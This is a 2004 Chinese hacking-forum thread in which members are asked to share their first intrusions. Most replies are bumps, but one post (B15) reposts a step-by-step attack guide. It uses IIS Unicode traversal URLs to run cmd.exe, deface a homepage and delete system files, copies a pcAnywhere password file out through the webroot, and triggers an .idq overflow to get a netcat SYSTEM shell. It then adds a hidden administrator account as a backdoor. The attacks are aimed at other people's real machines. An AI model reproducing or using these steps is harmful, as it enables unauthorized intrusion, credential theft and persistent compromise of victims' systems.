|
![]() | 作者: semimail [semimail]
![]() |
登录 |
各位老大,可否把您的第一次入侵或最近入侵的过程写下来,给大家看看,也给菜鸟们看看啊! 入侵过的请写下来,是菜鸟的请顶! ![]() |
地主 发表时间: 04-05-22 21:35 |
![]() | 回复: qinkechao [qinkechao] ![]() |
登录 |
我也来给你顶一下 |
B1层 发表时间: 04-05-22 22:01 |
![]() | 回复: ts198794 [ts198794] ![]() |
登录 |
我也顶~ |
B2层 发表时间: 04-05-22 22:22 |
![]() | 回复: semimail [semimail] ![]() |
登录 |
再顶!![]() |
B3层 发表时间: 04-05-23 02:25 |
![]() | 回复: netspirit [netspirit] ![]() |
登录 |
我顶! |
B4层 发表时间: 04-05-23 07:24 |
![]() | 回复: xjgxjm [xjgxjm] ![]() |
登录 |
我还顶!! |
B5层 发表时间: 04-05-23 10:42 |
![]() | 回复: mj8314 [mj8314] ![]() |
登录 |
我也顶呀 |
B6层 发表时间: 04-05-23 14:48 |
![]() | 回复: hacker521 [hacker521] ![]() |
登录 |
第一次入侵呀!我想想,恩!好象很久,几乎记不清,只记得是在网吧看帖子时找到了一个最新漏洞攻击的程序就去入侵了。那时只以为好玩而已,大家可不要学我 |
B7层 发表时间: 04-05-23 15:13 |
![]() | 回复: zl215 [zl215] ![]() |
登录 |
我也顶一下![]() ![]() |
B8层 发表时间: 04-05-23 15:15 |
![]() | 回复: semimail [semimail] ![]() |
登录 |
无风之夜老兄,写清楚点撒,这很让菜鸟的我们着急的,再说,不学怎么行?![]() |
B9层 发表时间: 04-05-23 16:25 |
![]() | 回复: sjhaike [sjhaike] ![]() |
登录 |
怎么还没人发表呀![]() 我也来顶一下 让更多人一起来 同意的顶呀 !!1! |
B10层 发表时间: 04-05-24 16:48 |
![]() | 回复: lijingxi [lijingxi] ![]() |
登录 |
我第一次是在学校网吧 计算机是WIN2000 pro 用X_SCAN扫描了一个若口令!然后按着教程上说的一点一点入侵成功! 教程需要的和我联系吧! |
B11层 发表时间: 04-05-24 17:21 |
![]() | 回复: semimail [semimail] ![]() |
登录 |
我要啊, xf840201@163.com 这是我的信箱,呵呵,如果您不介意,您可以发表在这里啊,呵呵,有很多人期待的哦!![]() |
B12层 发表时间: 04-05-24 18:42 |
![]() | 回复: semimail [semimail] ![]() |
登录 |
怎么没人来顶呢????![]() |
B13层 发表时间: 04-05-31 17:45 |
![]() | 回复: wenc [wenc] ![]() |
登录 |
模拟入侵算不算,我第一次时是请死党和我一起搞的,只能算模拟吧,不过后来慢慢就可以了,![]() 那有很多基本的入侵工具(木马) ![]() ![]() ![]() ![]() |
B14层 发表时间: 04-05-31 18:03 |
![]() | 回复: lijingxi [lijingxi] ![]() |
登录 |
1 UNICODE漏洞 这是老漏洞了,但对于新手来说很好用,而且事实证明现在仍有很多的机子有这种漏洞,OK我们开始 先用扫描器扫到有UNICODE漏洞的机子,(注意漏洞的编码方式有所不同有的是..%CI%IC.. 用的是..%C0%AF..当然还有其它的方式, 具体根据你的扫描器扫出的结果为标准 我们在流览器(IE)的地址栏中输入 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir 这时你可以看到它的系统目录但我们要的是主页面放置的目录 在输入 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot 看到了吧,目录中的INDEX.HTML INDEX.ASP DEFAULT.ASP DEFAULT.ASP等等就是它的主页面, 我们来换它的页面 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe http://ip/scripts/ccc.exe?/c+echo+Hacked+by+KAWEN+ >+c:\inetpub\wwwroot\default.asp OK 成功了,此时它的主页面被换成了HACKED BY KAWEN 大家可以看看 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe 执行后是复制,如果换成这个呢 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+DEL+c:\winnt\system32\cmd.exe 没错就是删除了 知道怎么做了吧 呵呵 2利用PCANWHERE攻击网站 现在开始入正题了,刚才只是热身 由于NT的机器一般使用PCAnyWhere进行远程管理,因此如果能够得到PCAnyWhere远程连接的帐号和密码,那么就能远程连接到主机。 ( http://fxyong.3322.net/getpwd.zip )便可以取得帐号和密码 Telnet IP 5631 我们可以看看PCANYWHERE开了没 使用Unicode漏洞+ PCanyWhere密码查看工具 首先我们要DOWN一个可以破 Pcanywhere的工具 http://www.symantec.com/ OK 我们现在要找到主机上的*.CIF文件 在IE中输入 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir c:\*.cif /s 一般Citempl.cif为系统默认的密码文件,因此我们需要SA.CIF文件。 复制该文件到网站目录下。 需要知道网站目录,可以通过ida,idq漏洞进行得到,也可以去寻找网站中的一个图片文件,比如Tscontent.gif文件,然后去查找该文件:使用命令 dir c:\ Tscontent.gif /s 比如网站目录为c:\inetpub\wwwroot\ 一般都有是啦 呵呵 密码文件所在目录:c:\Program Files\pcANYWHERE\DATA 下面执行Copy命令: http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy c:\Program Files\pcANYWHERE\DATA\SA.CGI c:\inetpub\wwwroot\ 显示1 file(s) copied,就表示复制成功了。 使用IE下载该文件 使用 http://IP/sa.cif 就可以下载该文件了。 使用PCanyWhere密码查看工具得到用户名和密码 3利用.idq漏洞 为了方便大家可以看懂下面说的是什么可以先到这里来看看 http://snake12.top263.net/IISOverflow/IISOverflow.htm 一共有两个版本.一个是GUI版本.一个是命令行版本. 这里我们来说CUI版本,反正都差不多了,关键是要多试 首先我们要找到有.IDQ漏洞的机子,可以用流光扫一下 运行软件 在被攻击IP地址后面写上对方的IP.端口号一般不需要改动. 左面选择操作系统类型.先选择IIS5 English Win2k Sp0吧~ 软件的默认绑定CMD.EXE的端口是813.不改了.用默认吧~~~ 点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了. 接着我们用NC,你可以到到盟下载 www.CNHONKER.COM C:\>nc -vv XXX.XXX.XXX.XXX 813 XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> OK!!!上来了 你现在有SYSTEM权限,不错吧,该做什么不用我教了吧,比如为自已留下个后门 net user hacker password /add '添加一给名为hacker,密码为passwod的用户! net localgroup administrators hacker /add ' 把刚才创建的用户加入 Admnistrators组 OK我们在来看看DOS版本 下载软件后会有个运行文件,它太长了,将它必名为KAWEN D:\>KAWEN 运行参数: 操作系统类型 目的地址 web端口 溢出端口 支持的操作系统 类型: ---- 0 -- IIS5中文Win2k Sp0 1 -- IIS5中文Win2k Sp1 2 -- IIS5中文Win2k Sp2 3 -- IIS5 English Win2k Sp0 4 -- IIS5 English Win2k Sp1 5 -- --not support -- IIS5 English Win2k Sp2 6 -- IIS5 Japanese Win2k Sp0 7 -- IIS5 Japanese Win2k Sp1 8 -- --not support -- IIS5 Japanese Win2k Sp2 D:\>KAWEN 3 XXX.XXX.XXX.XXX80 456 连接目的机器 XXX.XXX.XXX.XXX:80 OK. 发送shellcode 到 XXX.XXX.XXX.XXX:80 OK 现在,你可以 连接 该主机的 端口 456了,good luck.! 开始吧 D:\>nc -vv XXX.XXX.XXX.XXX 456 mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused sent 0, rcvd 0: NOTSOCK 没成功.试试sp1. D:\>KAWEN 4 XXX.XXX.XXX.XXX 80 888 连接目的机器 XXX.XXX.XXX.XXX:80 OK. 发送shellcode 到 XXX.XXX.XXX.XXX:80 OK 现在,你可以 连接 该主机的 端口 888了,good luck.! D:\>nc -vv XXX.XXX.XXX.XXX 888 XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> 看看我们又成功了 斯文败类转载! |
B15层 发表时间: 04-05-31 18:35 |
![]() | 回复: clark008 [clark008] ![]() |
登录 |
![]() |
B16层 发表时间: 04-05-31 18:43 |
![]() | 回复: lijingxi [lijingxi] ![]() |
登录 |
![]() |
B17层 发表时间: 04-05-31 18:45 |
![]() | 回复: semimail [semimail] ![]() |
登录 |
马上就去,嘿嘿~~~~~~~~~~~~~~~~~! 败类兄, ![]() |
B18层 发表时间: 04-06-01 22:53 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号